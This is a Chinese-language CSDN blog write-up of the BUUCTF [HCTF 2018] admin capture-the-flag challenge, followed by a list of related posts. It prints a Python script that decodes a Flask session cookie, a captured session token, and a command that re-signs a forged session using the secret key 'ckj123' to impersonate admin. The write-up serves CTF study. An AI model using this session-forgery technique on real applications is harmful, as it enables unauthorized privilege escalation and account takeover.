buuctf-admin

已于 2022-05-23 20:31:17 修改
阅读量340 收藏
点赞数
文章标签: flask python 后端
于 2022-05-23 20:28:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ANYOUZHEN/article/details/124924370
版权
博客内容涉及了对Flask Web应用框架的理解,特别是关于客户端Session的安全性。作者探讨了XSS攻击无效后,转向研究如何解密并伪造Flask Session来解题。文章包含了一段Python脚本,用于解密Session,并提到了通过修改Session内容实现权限伪造的可能性。
摘要由CSDN通过智能技术生成

打开靶机

注册后发现

点开后发现有一个留言板和一个修改密码的界面,还有一个没啥用的退出界面

既然看到了有留言板,试试xss

试了各种xss,发现没有用,估计后端代码对xss进行了处理

试试修改密码页面的情况,看下修改密码页面的源代码

 先来了解一下flask知识,通过网上查找

flask是一个使用 Python 编写的轻量级 Web 应用框架,其 session 存储在客户端中,也就是说其实只是将相关内容进行了加密保存到session中。和服务端的session不同,服务端的session保存在服务端中,依靠客户端cookie值中的sessionId来进行识别。本身sessionId是没有价值的,而客户端的session是可以被截取破解后得到有价值的原文

抓包看一下自己的session

我们可以利用flask session伪造来解题 ,从网上找到了一段python脚本解密session

#index.html
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
 
def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)
 
    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True
 
    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')
 
    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')
 
    return session_json_serializer.loads(payload)
 
if __name__ == '__main__':
    s = "这里填入需要解密的session"
    print(decryption(s.encode()))

如果pycharm没安装flask,记得安装即可

.eJw9kEFrg0AQhf9K2XMOatOLkIOwGiLMSMtE2bmENDVZd10DJkHdkP9em0IO7zLv8T3m3cXu2NcXLeJrf6sXYtf8iPgu3r5FLEAmgSI1caUGlq1TlIxskkhR69BnFtdlg1XegMwcSAiL6sspYwflDxGT1uBtMOcnNmkIhi3LU4g-d-BzAy4dIco1yrJFqQZlZqZJPFJpWNol-NKATN_BWA8yb8Foh4SzWBfr7VjQZmCDmin561iJx0IcLv1xdz3bunu9UFA6Km8nNFnLtJkK2n5wBV6RDRWhRsoNyvkmYcIoXXKV6eJz9cQ1bn-qX6RDZ0M4_Tvd3s2G2HfT-eb1XLcQt0vdP7cTYSAev8ITcMM.YosQSQ.wl52H6kt_O2Mc-nGbYzIHYT7dyQ

解码后得到

从中的name后面可以看到这就是我们注册的名字,我们将name的名字修改为admin按理说应该可以达到伪造的效果

加解密脚本:解密脚本

py3 flask3.py encode -s ckj123 -t "{解密后修改的内容}"     //在cmd中启动

将session更改

 

ANYOUZHEN
关注
开发工具 sb-admin-2
05-31
开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 ...
BUUCTF学习笔记-admin
Emmawas的博客
09-25 1347
CTF考点:session欺骗、flask框架
BUUCTF之 [HCTF 2018]admin
m0_62107966的博客
09-22 911
BUUCTF之 [HCTF 2018]admin-----这里的ckj123等下使用脚本时是需要用来作为参数的。刚刚以 1 用户登进去后给了个session源代码的意思是:用户如果以admin的身份登录,就直接可以拿到flag了,所以直接注册账号为admin,密码为123就成功拿到flag了。如果使用脚本的话,就需要伪造session为admin登陆的时候。使用脚本解密,脚本命名为session解密.py运行得到:得到如下:将name的值修改为admin,重新用脚本在进行加密。
BUUCTF [web专项23][HCTF 2018]admin
yanglinchiji的博客
11-05 113
别人的做法是session伪造和unicode欺骗之类的。需要登录,题目提示admin,先用admin试试。发现密码是1竟然也能过(弱口令爆破)后面发现我这个算是投机取巧。右上角点击login。
【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
m0_52923241的博客
08-23 1856
[HCTF 2018]admin 这里有两个选项,点击register注册一个新账户 下面这就算是登进来了 查看源码 提示you are not admin,可能需要登录admin才能获取我们想要的东西
dubbo-admin
02-08
【标题】"dubbo-admin" 是 Dubbo 项目中的一个组件,它是一个基于 Dubbo 框架的管理控制台,用于监控和服务治理。Dubbo 是阿里巴巴开源的高性能、轻量级的服务框架,广泛应用于微服务架构中。dubbo-admin 提供了图形...
dubbo-admin
03-09
【标题】"dubbo-admin包"是Dubbo框架的一个重要组成部分,主要用作服务治理的管理界面。这个压缩包包含了运行Dubbo管理控制台所需的所有文件,使得开发者和运维人员可以方便地监控、管理和配置Dubbo服务。 【描述】...
iview-admin
08-16
iview-admin 好多人在 GitHub 下不下来,这块提供下载包
BUUCTF Web [HCTF 2018]admin
网安小趴菜
10-12 671
BUUCTF Web [HCTF 2018]admin
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 7498
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
Buuctf admin
Dexret的博客
12-09 3332
打开该靶机,发现为一个登陆的界面 总共有三个界面,分别为主界面,login登陆界面和register注册界面 根据标题,猜测应该是让我们用admin的用户去登陆 尝试对登陆界面进行SQL注入 发现为500错误,无法对其注入 那么转换下思路,先注册一个进去看一下(admin用户无法被注册,需要用另外用户名) 发现里面有四个界面,第一个为主界面,第二个类似留言板,但是xss被完全过滤了,第三个为修改密码界面,第四个为退出 在这四个界面中,只剩下修改密码这个界面可以作为突破点 查看一下该页
CTF| 简易留言板
qq_42646885的博客
07-08 2981
打开网址是个简易留言板,有两个输入框可以输入。 随便输入几个字符提交后,发先提交一条记录返回四个信息。这四个信息中,姓名和内容是由输入内容决定的,其他两个时间和ID是不可控的,时间获取的是当前时间,可能是使用了SQL的now()函数,ID可能是从1自动增长的。 试下注入,输入一个单引号',提示留言失败。在昵称输入两个单引号,留言成功,昵称显示只有一个单引号。这个应该是Insert二次注...
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6510
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF__[HCTF 2018]admin_题解
风过江南乱的博客
05-18 1606
一、看题 拿到题目,发现一个欢迎页面。有注册、登录功能。 首先习惯性 F12。发现提示。 提示不是 admin ,那我们尝试登录用户名 admin ,密码随便输入,提示密码错误。尝试注 册 admin ,提示账号已被注册,那么我们怎么才能用 admin 登录呢。 那先尝试随便注册一个账号登录看看有什么内容,注册用户名和密码都为1,登录。 发现有修改密码功能。 可以注册、登录、修改密码,很自然的想到二次注入。 事实上,预期解的确是二次注入,只不过有好几种非预期解法。 二、研究 这题得到flag,实
web学习 --------admin(buuctf)
weixin_44897902的博客
12-01 953
unicode欺骗,flask session伪造,条件竞争
ctf打卡第7天
jie_a的博客
06-18 249
打开网页,查看源代码是这样的 首先判断是否存在一个$user,并且读取文件===the user is admin 我们可以用php伪协议读取,他就会完整的等于文件内容 php://input 是个可以访问请求的原始数据的只读流. 这题不对劲呢,等会再说 ...
BUUCTF--web(2)
最新发布
2302_79119987的博客
04-26 805
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
BUUCTF admin
biggerpig的博客
09-24 937
buuctfweb类型admin题目
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值